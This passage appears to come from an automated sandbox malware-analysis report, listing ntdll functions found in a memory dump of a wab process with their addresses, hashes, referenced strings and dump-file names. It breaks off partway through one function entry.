                            • Opcode ID: 7f8db2aca0916e9103604d0fe22750ab0b43149df475909f15273e6ab0ccb6e2
                            • Instruction ID: 5585f48c047b43f039622a5bc5cf48b12065c9047f8cf7b01c28c24840cbefcb
                            • Opcode Fuzzy Hash: 7f8db2aca0916e9103604d0fe22750ab0b43149df475909f15273e6ab0ccb6e2
                            • Instruction Fuzzy Hash: 5D718B70A087419FC718DF24C580A0ABBF9FF9C618F1449BEE49A87262D730DA05CF96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23C0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                            Download Yara Rule
                            Strings
                            • TargetNtPath, xrefs: 23C0B82F
                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 23C0B82A
                            • GlobalizationUserSettings, xrefs: 23C0B834
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                            • API String ID: 0-505981995
                            • Opcode ID: 7de17e2ade7cc86fd44e243feee720f7f9f1e2271d2da073bc2e2adcbc10dbd3
                            • Instruction ID: 716613f8145db52f671a96c607ba1d916160960c9640ec5bbe08658139680e0f
                            • Opcode Fuzzy Hash: 7de17e2ade7cc86fd44e243feee720f7f9f1e2271d2da073bc2e2adcbc10dbd3
                            • Instruction Fuzzy Hash: 78618F72D41269ABDB31DF54DC88BDAB7B8AF18710F0101E5A648EB250DB74DE80CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                            Download Yara Rule
                            Strings
                            • HEAP[%wZ]: , xrefs: 23B8E6A6
                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 23B8E6C6
                            • HEAP: , xrefs: 23B8E6B3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                            • API String ID: 0-1340214556
                            • Opcode ID: 1d02159f5f3b4ad5b63ba0d10ee16e6b7fa95247a69bd977df7fe79203d525d1
                            • Instruction ID: 41ddbf3692f90fc8a63213013720b71eab7fa6d35e4c182d8b9489f05f693ab6
                            • Opcode Fuzzy Hash: 1d02159f5f3b4ad5b63ba0d10ee16e6b7fa95247a69bd977df7fe79203d525d1
                            • Instruction Fuzzy Hash: 57519035604B84EFD712DFA4C898B96BBE8EF05700F0401F5EA588B6A2D774EA50CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                            Download Yara Rule
                            Strings
                            • Failed to reallocate the system dirs string !, xrefs: 23BA82D7
                            • minkernel\ntdll\ldrinit.c, xrefs: 23BA82E8
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 23BA82DE
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1783798831
                            • Opcode ID: 3f54ea2955f2da881c88c6639079ba9a645d262720705c7ee27214967ef2d499
                            • Instruction ID: 180e52d754626ea70e576da7446c1235598599ee6bddf62ea77085c23bd7d91d
                            • Opcode Fuzzy Hash: 3f54ea2955f2da881c88c6639079ba9a645d262720705c7ee27214967ef2d499
                            • Instruction Fuzzy Hash: 6241E6B1915704ABC720FF64C844B5B7BE8EF68750F0445BAFA88D7261EB74EC108BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                            Download Yara Rule
                            Strings
                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 23BA1B39
                            • minkernel\ntdll\ldrtls.c, xrefs: 23BA1B4A
                            • LdrpAllocateTls, xrefs: 23BA1B40
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                            • API String ID: 0-4274184382
                            • Opcode ID: b4dac3be387b125ac00267782ca09e0cd4b7fdacd6fffc04ddedaeb70235d7fe
                            • Instruction ID: d2a199710af9392b1adcb3a072296aa5bb9320e9c450ac3c8a1418409da05344
                            • Opcode Fuzzy Hash: b4dac3be387b125ac00267782ca09e0cd4b7fdacd6fffc04ddedaeb70235d7fe
                            • Instruction Fuzzy Hash: AE417DB5E00608AFCB15DFA8C880BAEBBF5FF68714F1481A9E515A7211E774A901CF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                            Download Yara Rule
                            Strings
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 23BEC1C5
                            • PreferredUILanguages, xrefs: 23BEC212
                            • @, xrefs: 23BEC1F1
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            • API String ID: 0-2968386058
                            • Opcode ID: a4ab0d4d343a8155f32a0476a17a172fd278d420aa646686d571d321980260cd
                            • Instruction ID: 687806f850af55b65364554cdcc1dbd02386266a081b9597f1a6501be952088b
                            • Opcode Fuzzy Hash: a4ab0d4d343a8155f32a0476a17a172fd278d420aa646686d571d321980260cd
                            • Instruction Fuzzy Hash: 51415E72E00209ABDB12DFD8C891FDEB7B8EB18701F5441BAE619B72A0D7749A44CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            • API String ID: 0-1373925480
                            • Opcode ID: 0bab3e8d81310822a835d9e233240a1c644862c4bb61118cfbcd5cb21ff5f94d
                            • Instruction ID: b069de72be8a8521d292c8f470fbf8c646172e3e86417d65dd3d6b1ce260eed9
                            • Opcode Fuzzy Hash: 0bab3e8d81310822a835d9e233240a1c644862c4bb61118cfbcd5cb21ff5f94d
                            • Instruction Fuzzy Hash: C241C071E103988FEB22DF95C841B9DBBB8EF69340F1808FAD951AF691D6748A01CB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrredirect.c, xrefs: 23BB4899
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 23BB4888
                            • LdrpCheckRedirection, xrefs: 23BB488F
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-3154609507
                            • Opcode ID: 429240142ce8b02c3befdff2bab584a1c1855546f1b7c586597b75b9b9d34cda
                            • Instruction ID: f87568de1d9b8abdde7428357e88ca552fb977c4797329c26eadffdc2d2cc821
                            • Opcode Fuzzy Hash: 429240142ce8b02c3befdff2bab584a1c1855546f1b7c586597b75b9b9d34cda
                            • Instruction Fuzzy Hash: 8B41C132B056909FCB11EE69D840A267BFAFF69A50F0505F9ED58D7222DB30DD00CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                            Download Yara Rule
                            Strings
                            • Actx , xrefs: 23B633AC
                            • RtlCreateActivationContext, xrefs: 23BA29F9
                            • SXS: %s() passed the empty activation context data, xrefs: 23BA29FE
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                            • API String ID: 0-859632880
                            • Opcode ID: fcc97f8fab5c56253e44618be85593002ddc8808b8dc503938ce2e3e5e0e0222
                            • Instruction ID: 91c8940576dbce3d2d5245b2f767acab9a2baeb454af75e585c394fc83fc2df3
                            • Opcode Fuzzy Hash: fcc97f8fab5c56253e44618be85593002ddc8808b8dc503938ce2e3e5e0e0222
                            • Instruction Fuzzy Hash: EA310132A147059FDB12DF58C8D0F96B7A4EB88710F1584F9EE189F2A6CB70D951CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            Strings
                            • LdrpInitializeTls, xrefs: 23BA1A47
                            • DLL "%wZ" has TLS information at %p, xrefs: 23BA1A40
                            • minkernel\ntdll\ldrtls.c, xrefs: 23BA1A51
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                            • API String ID: 0-931879808
                            • Opcode ID: 699ac572349ca7e497acfb879051cc1557b6b47983c50daf528385931f3c853f
                            • Instruction ID: a34c54d629fbe6717efb2ea4f39271e28244cd7fe9651365a43096b84d7dc18b
                            • Opcode Fuzzy Hash: 699ac572349ca7e497acfb879051cc1557b6b47983c50daf528385931f3c853f
                            • Instruction Fuzzy Hash: 5C312672E10600AFD710DF98CD98F6BB6ACFB68754F0400F9E505B7192E774AE068BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                            Download Yara Rule
                            Strings
                            • @, xrefs: 23B712A5
                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 23B7127B
                            • BuildLabEx, xrefs: 23B7130F
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 0-3051831665
                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                            • Instruction ID: d1e895234531cdc048101f71def4cc0545c010bb372cd6d27e6541127164d4f6
                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                            • Instruction Fuzzy Hash: C9317072900618BBDB21DF95CD44E9EBBB9EB98650F0140B5EA24A7260E730DA05DB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            • LdrpInitializationFailure, xrefs: 23BB20FA
                            • Process initialization failed with status 0x%08lx, xrefs: 23BB20F3
                            • minkernel\ntdll\ldrinit.c, xrefs: 23BB2104
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2986994758
                            • Opcode ID: c9b64dbf7c3ae36ccb4d02c6b8f1f5e08e4f9e96d58a920db87eb3798ae8f2b1
                            • Instruction ID: bf8fb1c78eb0d631460795cb56407581a7fe19825318fe65a3dc5411d2e997a3
                            • Opcode Fuzzy Hash: c9b64dbf7c3ae36ccb4d02c6b8f1f5e08e4f9e96d58a920db87eb3798ae8f2b1
                            • Instruction Fuzzy Hash: F5F0C871A20308AFD710EF4CCD46FA97779EB54B54F1100F5FA50AB695D6B0E910CA51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: #%u
                            • API String ID: 48624451-232158463
                            • Opcode ID: 3fdae255c484e838ad832db411ca4f8009114da0df13d96b53d28cbb28108d97
                            • Instruction ID: 3c908b3b34502603187d38c70cdabc1f7ad6fc136bfe60b74b6b8e738f967693
                            • Opcode Fuzzy Hash: 3fdae255c484e838ad832db411ca4f8009114da0df13d96b53d28cbb28108d97
                            • Instruction Fuzzy Hash: BF713971E002499FDB01DFA8D990FAEB7B8FF58344F1540B5EA04A7251EA34EE01CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@
                            • API String ID: 0-149943524
                            • Opcode ID: 26c71274cc1e3a6fe01568fa93a5bf712eb801f9a03de33cd22d95b7dc20c83d
                            • Instruction ID: e6e97156f89d09e2820499bc036c4a113de46b7b65fa25de55a9eb75881ae2c3
                            • Opcode Fuzzy Hash: 26c71274cc1e3a6fe01568fa93a5bf712eb801f9a03de33cd22d95b7dc20c83d
                            • Instruction Fuzzy Hash: BF32D0709087518BD724DF24C4A0B2EB7F5EF88750F1449BEFA958B2A0E734C940EB5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                            • Instruction ID: a7e7c4771ec8391978eaf60806bf37d28436bd2398f1b3f1b5ffc9f70e791b21
                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                            • Instruction Fuzzy Hash: 75C1BD312043429BDB28CF28C841B2BBBE5EFC9358F185ABDF6958A2A0D774D509CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: 852bb33c2eadb3fb03298649633ea3ad52c15d9670aceefad5cce7ced74cfc57
                            • Instruction ID: c76fdb052bc72a74f572e86be36e915385b338dbe46b8c2e99b0e57c2af88164
                            • Opcode Fuzzy Hash: 852bb33c2eadb3fb03298649633ea3ad52c15d9670aceefad5cce7ced74cfc57
                            • Instruction Fuzzy Hash: 52614D76E047589FDB24DFACC880BADBBB9FB48B40F1440B9E699EB251D7319900CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$
                            • API String ID: 0-233714265
                            • Opcode ID: ca4f8a1f3efee64831dcfdf2f0fd5a4662d125fc149747af1f6e34c35d50636f
                            • Instruction ID: 3f741f49dee2fc608ca16700c0e22511621c2d624ef3ae404a1cba632d6c36f9
                            • Opcode Fuzzy Hash: ca4f8a1f3efee64831dcfdf2f0fd5a4662d125fc149747af1f6e34c35d50636f
                            • Instruction Fuzzy Hash: A6610D31E00789DFDB20DFA4C5A8B9DB7B1FF58304F0440B9D614AB291CB34A941EB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                            Download Yara Rule
                            Strings
                            • RtlpResUltimateFallbackInfo Enter, xrefs: 23B3A2FB
                            • RtlpResUltimateFallbackInfo Exit, xrefs: 23B3A309
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                            • API String ID: 0-2876891731
                            • Opcode ID: c0a79004c36ea9eefb392d4328962dfb6186b6ac5492cf5fad2e8fab9fe7c312
                            • Instruction ID: 108caec1b410603f91dfff24d3b9ceb0ac3f408f28be4ed8cc652a701e593333
                            • Opcode Fuzzy Hash: c0a79004c36ea9eefb392d4328962dfb6186b6ac5492cf5fad2e8fab9fe7c312
                            • Instruction Fuzzy Hash: 93419A31E056A9DBDB11DF69C880B6A77F4EF86700F2840F9ED04DB2A1E635DA00CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local\$@
                            • API String ID: 0-380025441
                            • Opcode ID: 2d5c4a836565a018e44ba2b961d948e7f638e58d72888b900e4965678c91d728
                            • Instruction ID: 94dee4c989fcd60defa5cad7dad7eb1345385f82b8a659360154b4cff27b3bb4
                            • Opcode Fuzzy Hash: 2d5c4a836565a018e44ba2b961d948e7f638e58d72888b900e4965678c91d728
                            • Instruction Fuzzy Hash: C53184725087449FC311DF28C980A5BBBE8FBD9654F48097EF5A987261DA34DE04CF92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: MUI
                            • API String ID: 0-1339004836
                            • Opcode ID: e8371663323c094ef7a58f8e40e2cfab7d511ad7347da57e41d25d24346110c3
                            • Instruction ID: e769e132a589dfd38cc9e778b193dc50f6a61e9c42504c1f398697755ea822f7
                            • Opcode Fuzzy Hash: e8371663323c094ef7a58f8e40e2cfab7d511ad7347da57e41d25d24346110c3
                            • Instruction Fuzzy Hash: BA828F75E002688FDB24DFA9C880BDDB7B5FF4A700F1481BAE919AB261D7309D85CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e5f1675d7cb5e1620521151c61cfd46611f491f4f800648ff39a44d6bfdfd53
                            • Instruction ID: 6400eccbe1a9e36bc83328dc52ea4cac687f13f5c4a70c00f4743e656796653f
                            • Opcode Fuzzy Hash: 1e5f1675d7cb5e1620521151c61cfd46611f491f4f800648ff39a44d6bfdfd53
                            • Instruction Fuzzy Hash: C4A15871A08341CFD314DF28C481A1ABBE9FF99304F1549BEE5849B761EB70EA45CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                            Download Yara Rule
                            Memory Dump Source
